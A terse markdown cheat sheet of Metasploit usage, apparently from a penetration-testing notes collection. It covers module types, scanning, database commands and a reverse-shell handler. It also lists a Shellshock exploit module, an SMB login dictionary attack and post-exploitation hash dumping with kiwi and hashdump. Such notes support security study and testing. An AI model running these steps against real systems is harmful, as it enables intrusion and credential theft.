killchain-compendium/metasploit.md

1.6 KiB

Metasploit

Modules

  • Auxiliary scanners, crawlers and fuzzers
  • Encoders encode payloads
  • Evasion prepare payloads to circumvent signature based malware detection
  • NOPs various architectures
  • Payloads to run on target systems
    • Singles, inline payloads, for example generic/shell_reverse_tcp
    • Stagers, downloads the stages payloads
    • Stages, for example windows/x64/shell/reverse_tcp
  • Post postexploitation

Notes

  • Search via scope
search type:auxiliary <stuff>
  • Send exploit to background
run -z
  • check if target is vulnerable
  • setg sets variables globally
  • unset payload
  • Flush via unset all

Sessions

  • background or ctrl+z
  • Foreground via sessions -i <number>

Scanning

  • Portscan
search portscan
  • UDP Sweep via scanner/discovery/udp_sweep
  • SMB Scan via scanner/smb/smb_version and smb_enumshares
  • SMB login dictionary attack scanner/smb/smb_login
  • NetBios via scanner/netbios/nbname
  • HTTP version scanner/http/http_version

Database

  • Start postgres
  • msfdb init
  • db_status
  • Separate workspace -a <projectname>
  • Safe scans via db_nmap
  • Show hosts
  • Show services
  • Set RHOST values via hosts -R

Exploits

  • show targets
  • show payloads

Reverse Shells

  • Multihandler, set options
use exploit/multi/handler
set payload <payloadhandler>
  • Shellshock as an example
use multi/http/apache_mod_cgi_bash_env_exec

Post Exploitation

  • Windows
    • load kiwi
    • hashdump
  • Linux
    • use post/linux/gather/hashdump